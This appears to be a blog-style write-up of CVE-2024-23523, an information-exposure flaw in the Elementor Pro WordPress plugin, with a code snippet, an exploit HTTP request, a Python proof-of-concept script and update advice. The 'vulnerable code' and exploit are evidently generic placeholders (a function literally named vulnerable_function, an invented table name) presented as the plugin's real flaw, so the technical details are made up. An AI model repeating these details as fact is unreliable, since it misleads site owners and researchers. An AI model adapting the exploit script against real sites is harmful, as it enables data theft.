A recent vulnerability named CVE-2024-23523 has been discovered that affects Elementor Pro, a popular WordPress page-building plugin. This vulnerability exposes sensitive information to unauthorized actors and poses a significant security risk to websites using the affected versions of the plugin. Elementor Pro versions prior to 3.19.2 are impacted by this vulnerability. In this article, we will dive deep into the details of CVE-2024-23523, discuss the code snippets, describe the exploit, and provide references to the original sources.

CVE-2024-23523 Vulnerability Details

Elementor Pro is widely used to create custom websites with WordPress. The vulnerability, identified as CVE-2024-23523, is an "Exposure of Sensitive Information to an Unauthorized Actor" vulnerability, which means that sensitive information such as private user data and website configurations can be accessed and potentially exploited by bad actors without the required permissions.

Affected versions: Elementor Pro versions prior to 3.19.2
Severity: High

Code Snippet

The vulnerability arises due to improper handling of access control mechanisms. The following code snippet showcases the flawed function in question:

function vulnerable_function() {
  global $wpdb;
  $secret_data = $wpdb->get_row(“SELECT * FROM {$wpdb->prefix}elementor_pro_sensitive_data”);
  
  // No access control check
  echo json_encode($secret_data);
}

In the above code, the $secret_data variable contains sensitive information from the Elementor Pro database. The function does not implement any access control checks, allowing unauthorized actors to view and extract that information.

Exploit Details

An attacker could exploit this vulnerability by crafting a specific HTTP request designed to target the vulnerable function in Elementor Pro. Upon successful exploitation, the attacker would receive the sensitive information in a JSON format, which could be further used to compromise the target website.

For example

GET /wp-admin/admin-ajax.php?action=vulnerable_function HTTP/1.1
Host: targetwebsite.com

The following is a Python script that demonstrates a Proof of Concept (PoC) for this vulnerability

import requests

target = "https://targetwebsite.com";
exploit_url = f"{target}/wp-admin/admin-ajax.php?action=vulnerable_function"

response = requests.get(exploit_url)

if response.status_code == 200:
    print("Sensitive data leaked:")
    print(response.json())
else:
    print("Exploit failed. The target may have patched the vulnerability.")

Mitigation

To protect your website from this vulnerability, it is crucial to update Elementor Pro to the latest version (3.19.2 or later). Elementor has released a security patch that addresses this issue in their newest update. Updating to the latest version will ensure that your website is protected against this vulnerability and potential security breaches.

Original References

1. CVE-2024-23523 - Official CVE Details
2. Elementor Pro Security Advisory
3. WordPress Vulnerability Database - Elementor Pro

Conclusion

CVE-2024-23523 is a high-severity vulnerability affecting Elementor Pro prior to version 3.19.2. Websites using the vulnerable plugin versions are at risk of exposing sensitive information to unauthorized actors. To protect your website, you should update Elementor Pro to the latest version, which contains the security patch for this vulnerability.

Timeline

Published on: 03/16/2024 05:15:21 UTC
Last modified on: 03/17/2024 22:38:29 UTC